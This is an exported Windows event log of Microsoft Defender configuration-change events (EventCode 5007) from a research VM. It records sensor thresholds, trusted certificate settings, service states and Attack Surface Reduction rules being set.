EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=598
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Diagnostics\LastSignatureUpdateResult = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Diagnostics\LastSignatureUpdateResult = 0x0
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=597
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MemorySensor\LowThresholds = 2|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\LowThresholds = 4|1024|128
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=596
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MemorySensor\MonitoredTargets = msmpeng|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=595
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MemorySensor\HighThresholds = 1024|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\HighThresholds = 16|2048|1024
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=594
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\DiskSensor\MonitoredTargets = msmpeng|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\DiskSensor\MonitoredTargets =
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=593
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CrashSensor\MonitoredTargets = msmpeng|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CrashSensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=592
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CpuSensor\LowThresholds = 5|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\LowThresholds = 10|10|10
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=591
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CpuSensor\MonitoredTargets = msmpeng|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=590
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CpuSensor\HighThresholds = 95|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\HighThresholds = 95|95|95
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=589
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\WdTimerMonitorInterval = 0x1388
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdTimerMonitorInterval = 0x493E0
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=588
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MdTrustedSubjectOrgs =
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MdTrustedSubjectOrgs = Microsoft Corporation|DigiCert Inc
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=587
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\WdConfigHash = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdConfigHash = 0x51AE05A1
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=586
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MdTrustedRootCertThumbPrints =
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MdTrustedRootCertThumbPrints = CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F|4348A0E9444C78CB265E058D5E8944B4D84F9662BD26DB257F8934A443C70161
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=585
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\WdTimerInitalDelay = 0x1388
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdTimerInitalDelay = 0x493E2
11/14/2023 10:42:33 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=581
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/14/2023 10:42:33 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=580
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/14/2023 10:42:30 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=579
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/14/2023 10:42:14 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=578
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=577
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=576
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=575
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=574
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=573
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=572
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=571
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=570
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=569
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=568
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=567
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=566
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=565
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=564
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=563
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=562
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=561
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=560
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=559
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=558
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=557
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=556
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=555
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=554
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=553
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=552
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=551
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
